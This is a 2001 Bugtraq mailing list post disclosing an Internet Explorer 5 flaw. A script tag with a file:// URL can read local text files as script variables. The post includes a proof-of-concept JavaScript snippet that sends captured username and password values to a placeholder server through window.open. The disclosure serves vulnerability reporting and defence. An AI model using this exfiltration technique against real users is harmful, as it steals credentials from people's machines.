Bugtraq mailing list archives
RE: security bug Internet Explorer 5
From: Stefaan Deman <Stefaan.Deman () compex be>
Date: Fri, 8 Jun 2001 10:33:38 +0200
I noticed that my previous mail was strangly reformatted. I guess Outlook tried to outsmart me again. The script tag should be <script src="file:///C:/WINNT/test.txt"></script> -----Original Message----- From: Stefaan Deman [mailto:Stefaan.Deman () compex be] Sent: Wednesday, June 06, 2001 10:27 AM To: 'bugtraq () securityfocus com' Subject: security bug Internet Explorer 5 There is a security bug in the Internet Explorer 5 (I haven't tested it on other browsers). It is possible to read some textfiles (others than cookies) from the client's hard disk. If there is for example in the directory 'C:\WINNT' a textfile 'test.txt' with content: us="stefaan" passwd="mypasswd" then it is possible to read this file in an HTML page with the tag: <script src=" <file:///C:/WINNT/test.txt> file:///C:/WINNT/test.txt"></script> The HTML page will consider the file as a script and us and passwd will be considered as variables in the previous example. It is then possible to use this information or send this (possible critical) information back to the webserver with for example <script> //alert(passwd) window.open(" <http://myurl/myasppage.asp?us> http://myurl/myasppage.asp?us=" + escape(us) + ";passwd=" + escape(passwd), "blabla") </script> This is a security bug, it should be impossible to read any file on the client's file system. Of course the file should have a correct JavaScript or VBscript syntax and the filename should be known. However, it is easy to image how this security hole can be misused. This bug isn't as severe as the one posted by Guninski ( <http://www.guninski.com/scractx.html> http://www.guninski.com/scractx.html). The difference between this bug and the one of Guninski is that this security hole doesn't make use of Active X components. Stefaan Deman
Current thread:
- security bug Internet Explorer 5 Stefaan Deman (Jun 07)
- Re: security bug Internet Explorer 5 Exploit & Vulnerability Alerting Service (Jun 08)
- <Possible follow-ups>
- RE: security bug Internet Explorer 5 Stefaan Deman (Jun 08)
- Re: security bug Internet Explorer 5 Victor A. Rodriguez (Jun 08)